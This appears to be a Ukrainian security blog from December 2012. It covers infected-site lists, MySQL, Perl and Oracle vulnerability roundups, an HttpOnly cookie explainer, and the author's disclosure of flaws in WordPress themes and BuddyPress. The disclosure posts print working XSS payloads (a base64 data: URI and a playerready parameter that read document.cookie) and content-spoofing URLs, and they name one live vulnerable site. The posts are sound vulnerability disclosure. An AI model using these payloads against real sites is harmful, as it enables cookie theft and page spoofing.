Websecurity - Веб безпека

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://mandrivi.com - інфекція була виявлена 22.12.2012. Зараз сайт входить до переліку підозрілих.
• http://ukrstor.com - інфекція була виявлена 08.12.2012. Зараз сайт не входить до переліку підозрілих.
• http://noutfix.com.ua - інфекція була виявлена 14.11.2012. Зараз сайт входить до переліку підозрілих.
• http://history.org.ua - інфекція була виявлена 14.12.2012. Зараз сайт не входить до переліку підозрілих.
• http://brusilov.com.ua - інфекція була виявлена 29.11.2012. Зараз сайт входить до переліку підозрілих.
• http://testo.kiev.ua - інфекція була виявлена 12.12.2012. Зараз сайт не входить до переліку підозрілих.
• http://ip-change.com - інфекція була виявлена 23.12.2012. Зараз сайт не входить до переліку підозрілих.
• http://kompass.ua - інфекція була виявлена 01.10.2012. Зараз сайт не входить до переліку підозрілих.
• http://bfg.org.ua - інфекція була виявлена 08.10.2012. Зараз сайт не входить до переліку підозрілих.
• http://itmag.com.ua - інфекція була виявлена 14.10.2012. Зараз сайт не входить до переліку підозрілих.

Виявлені численні уразливості безпеки в MySQL.

Уразливі продукти: MySQL 5.5, MariaDB 5.x.

Переповнення буфера, витік інформації, підвищення привілеїв, DoS.

• MySQL Local/Remote FAST Account Password Cracking (деталі)
• MySQL (Linux) Stack based buffer overrun PoC Zeroday (деталі)
• MySQL (Linux) Heap Based Overrun PoC Zeroday (деталі)
• MySQL (Linux) Database Privilege Elevation Zeroday Exploit (деталі)
• MySQL Denial of Service Zeroday PoC (деталі)
• MySQL Remote Preauth User Enumeration Zeroday (деталі)
• MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit (деталі)

Продовжу тему безпеки секюріті сайтів, яку я піднімав в попередніх записах Безпека сайтів про безпеку (1-20), 21, 22 та 23.

Ось нова добірка уразливих секюріті сайтів:

• goog.li
• security-testlab.com
• securityuncorked.com

Всім секюріті проектам та фірмам в галузі ІБ слід приділяти більше уваги безпеці власних веб сайтів.

У грудні, 15.12.2012, я виявив Cross-Site Scripting, Content Spoofing, Full path disclosure та Information Leakage уразливості в численних темах для WordPress. Про що вже повідомив розробникам цих тем.

Це теми виробництва RocketTheme, розробників Rokbox. Дані уразливості подібні до уразливостей в темі Affinity BuddyPress.

Всього я знайшов 16 вразливих тем: Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse, Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx, Moxy, Terrantribune, Meridian.

Шляхи в цих темах наступні:

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_solarsentinel_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/Mixxmag/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_iridium_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_infuse_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/infuse/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_perihelion_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_replicant2_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_affinity_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_nexus_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_sentinel/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_mynxx_wp_vestnikp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_mynxx_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt.mynxx.wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_moxy_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_terrantribune_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_meridian_wp/js/rokbox/jwplayer/jwplayer.swf

Content Spoofing (WASC-12):

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

XSS (WASC-08):

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Full path disclosure (WASC-13):

У всіх цих темах є FPD в index.php (http://site/wordpress/wp-content/themes/rt_afterburner_wp/ і так само для інших тем), що спрацьовує при налаштуваннях PHP по замовчуванню. Також FPD потенційно є в інших php-файлах цих тем.

Information Leakage (WASC-13):

Є сайти з темою rt_mixxmag_wp, що мають error log з FPD.

http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log

Приклад уразливого сайту з темою Mixxmag.

CS (WASC-12) і XSS (WASC-08):

http://securityuncorked.com/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf

Information Leakage (WASC-13):

http://securityuncorked.com/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log

Уразливі всі версії всіх вищенаведених тем для WordPress.

Виявлені численні уразливості безпеки в Perl.

Уразливі версії: Perl 5.15.

Переповнення буфера в decode_xs, впровадження коду в конструкторі Digest, переповнення буфера в операторі x, ін’єкція заголовків у CGI.pm.

• Perl vulnerabilities (деталі)

Серед технологій захисту від XSS атак можна виділити дві основні групи: серверні та клієнтські. Перші працюють повністю на стороні сервера (до них можна віднести як виправлення XSS уразливостей, так і використання WAF), другі працюють на стороні клієнта (і можуть вимагати підтримки в браузерах).

Причому клієнтські технології можна розділити на такі, що вимагають клієнтської підтримки, та такі, що не вимагають (реалізовані на JS). Тому такі технології захисту від XSS атак повинні не тільки підтримуватися в браузерах (і відповідно старі браузери без їх підтримки не будуть захищені), але й вони повинні бути включені на сервері. В своєму новому циклі статей я розповім вам про деякі з клієнтських технологій захисту від XSS. Серед них є такий захист як плагіни до браузерів (такий як NoScript для Firefox), але я буду розповідати про ті, які реалізуються на рівні поєднання серверних налаштувань і клієнтської підтримки (серверні заголовки), або ж на рівні JavaScript.

Прикладами таких технологій, які орієнтовані на браузери, є технології захисту від ClickJacking, про які я розповідав торік. Серед них є як плагіни до браузерів чи секюрні браузери, так і JS захист та заголовок X-Frame-Options. Першим серед технологій захисту від XSS атак я розгляну HttpOnly.

Заголовок HttpOnly встановлюється до кукісів. Для цього веб додаток повинен у своїй відповіді вказати серверний заголовок Set-Cookie з параметром HttpOnly:

Set-Cookie: name=value; expires=Tue, 1-Jan-2013 00:00:00 GMT; path=/; HttpOnly

І кожен з кукісів з таким параметром буде доступний лише для сервера, але не для клієнтського коду (JS/VBS). Це вбереже від класичних атак на викрадення кукіса.

Але це не вбереже від інших атак через XSS уразливості. Бо XSS атаки не обмежуються лише викраденням кукісів, про що я наголошував неодноразово. А також PDP ще в 2007 році писав про те, чому HttpOnly кукіси не врятують від XSS атак. До того ж, в перші роки після появи цієї технології та й в останні роки виявлялися методи обходу httpOnly в деяких браузерах.

Заголовок HttpOnly був придуманий Microsoft для Internet Explorer 6 SP1 в 2002 році і пізніше підтриманий іншими розробниками браузерів. І особисто я не вважаю його надійним захистом від XSS. Жодна з цих допоміжних технологій не може дати 100% гарантію захисту від XSS атак і вирішує лише частину проблеми, тільки виявлення та виправлення всіх XSS уразливостей дасть надійних захист. Але ці технології можна використати в парі з проведенням аудиту безпеки своїх сайтів, як додатковий елемент безпеки.

HttpOnly підтримують наступні браузери:

Internet Explorer 6 (повністю пропатчений) (тільки захист від читання)
Internet Explorer 6 SP1 (тільки захист від читання)
Internet Explorer 7+ (захист від читання і запису)
Mozilla Firefox 3.0.6+ (захист від читання і запису)
Netscape Navigator 9.0b3+ (захист від читання і запису)
Opera 9.50+ (тільки захист від читання)
Apple Safari 5+ (захист від читання і запису)
Google Chrome перші релізи (тільки захист від читання)
Google Chrome 12+ (захист від читання і запису)

У грудні, 15.12.2012, я виявив Cross-Site Scripting та Content Spoofing уразливості в плагіні BuddyPress для WordPress та темі Affinity BuddyPress для даного плагіна. Про що вже повідомив розробників веб додатку та теми для плагіна.

Стосовно плагінів для WordPress раніше я писав про уразливості в Rokbox для WordPress.

Ці уразливості пов’язані з JWPlayer і Rokbox, що використовуються в BuddyPress та темі Affinity. Всього я виявив на різних сайтах наступні інсталяції BuddyPress або теми для нього: з JWPlayer 5.5.1641, з JWPlayer 4.2.95, з Rokbox з JW Player 4.4.198 (в темі Affinity). Сайтів з цими флешками небагато, тому це можуть бути старі версії чи якійсь рідкі версії BuddyPress.

Для JWPlayer 5.5.1641 шлях наступний: http://site/wp-content/plugins/buddypress/bp-themes/bp-default/jwplayer/player.swf

Для JWPlayer 4.2.95 шлях наступний: http://site/wp-content/plugins/buddypress/bp-themes/file/player.swf

Для JWPlayer 4.4.198 в темі Affinity для BuddyPress шлях наступний: http://site/wp-content/plugins/buddypress/bp-themes/rt_affinity_wp-bp12/js/rokbox/jwplayer/jwplayer.swf.

XSS (WASC-08):

http://site/wp-content/plugins/buddypress/bp-themes/bp-default/jwplayer/player.swf?playerready=alert(document.cookie)

В 5.x версіях JW Player має місце ця XSS та інші уразливості. В 4.x версіях JW Player мають місце лише наступні уразливості.

Content Spoofing (WASC-12):

http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Уразливі версії BuddyPress з JW Player або з Rokbox з JW Player і тема Affinity BuddyPress 1.2 та попередні версії.

19.09.2012

Виявлені численні уразливості безпеки в продуктах Oracle.

Уразливі продукти: Oracle 10g, Oracle 11g, MySQL 5.1, MySQL 5.5, Oracle Application Server 10g, Oracle E-Business Suite Release 11i, PeopleSoft Enterprise HRMS 8.9, Oracle BI Publisher 10.1, PeopleSoft Enterprise CRM 9.1, PeopleSoft Enterprise SCM 9.0 та інші продукти Oracle.

Більше 90 уразливостей у різних продуктах усунуто в щоквартальному оновленні.

• Oracle Outside In Excel MergeCells Record Parsing Remote Code Execution Vulnerability (деталі)
• Oracle Outside In Excel File TxO Parsing Remote Code Execution Vulnerability (деталі)
• Oracle Outside In XPM Processing Remote Code Execution Vulnerability (деталі)

24.12.2012

Додаткова інформація.

• Oracle Gridengine sgepasswd Buffer Overflow (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Zarzadzanie Kontem, Webplayer та FireStorm Real Estate. Для котрих з’явилися експлоіти. Zarzadzanie Kontem - це спеціальний плагін, Webplayer - це медіа плеєр, FireStorm Real Estate - це плагін для розміщення списків нерухомості.

• WordPress Zarzadzanie Kontem Shell Upload (деталі)
• WordPress Webplayer SQL Injection (деталі)
• WordPress FS-Real-Estate SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

За повідомленням www.xakep.ru, ФБР виявило взлом промислової системи клімату-контролю.

Завдяки витоку інформації у відкритий доступ потрапила доповідна записка ФБР від липня 2012 року, адресована правоохоронним органам штату Нью-Джерсі. У документі говориться про взлом промислової системи керування однієї з компаній, у результаті чого зловмисники змогли встановити бэкдор і одержати доступ до пристроїв клімату-контролю (HVAC).

Взлому піддався фреймворк Tridium Niagara ICS, для якого неодноразово публікувалися експлоіти у відкритому доступі, ця система відома великою кількістю уразливостей.

За повідомленням www.opennet.ru, оновлення Chrome 23.0.1271.97 з усуненням критичної уразливості.

Компанія Google представила коригувальний випуск веб-браузера Chrome 23.0.1271.97, у якому усунуто 6 уразливостей і представлена порція виправлень помилок. Одній з уразливостей присвоєний статус критичної проблеми, що дозволяє обійти всі рівні захисту браузера. Критична проблема (CVE-2012-5142) виявлена співробітниками Google і виявляється у виході за границі буфера при виконанні операцій по роботі з історією відвідувань.

Ще три уразливості отримали статус небезпечних та дві - помірних. Після виходу Google Chrome 23 у листопаді, вже 12.12.2012 компанія випустила оновлення до цієї версії (не дочекавшись виходу нової версії). Вихід версії Chrome 24 очікується до кінця року.

За повідомленням www.xakep.ru, в магазині ExploitHub викрадені експлоіти на чверть мільйона доларів.

Хакерська група Inj3ct0r заявила про злом сайта одного з найбільших магазинів експлоітів ExploitHub.com. За словами хакерів, вони одержали у своє розпорядження всі бази даних і файли з FTP-сервера.

Зломщики провели аудит, тобто склали вартість усіх експлоітів, виставлених на продаж. По їхній оцінці, загальна вартість викраденої інформації складає рівно $242333.

Так що не тільки звичайні онлайн магазини та e-commerce сайти взламують, але й нелегальні, такі як магазини експлоітів. І ці війни хакерів повинні нагадати власникам онлайн магазинів, в тому числі підпільних, про необхідність слідкувати за безпекою власних сайтів.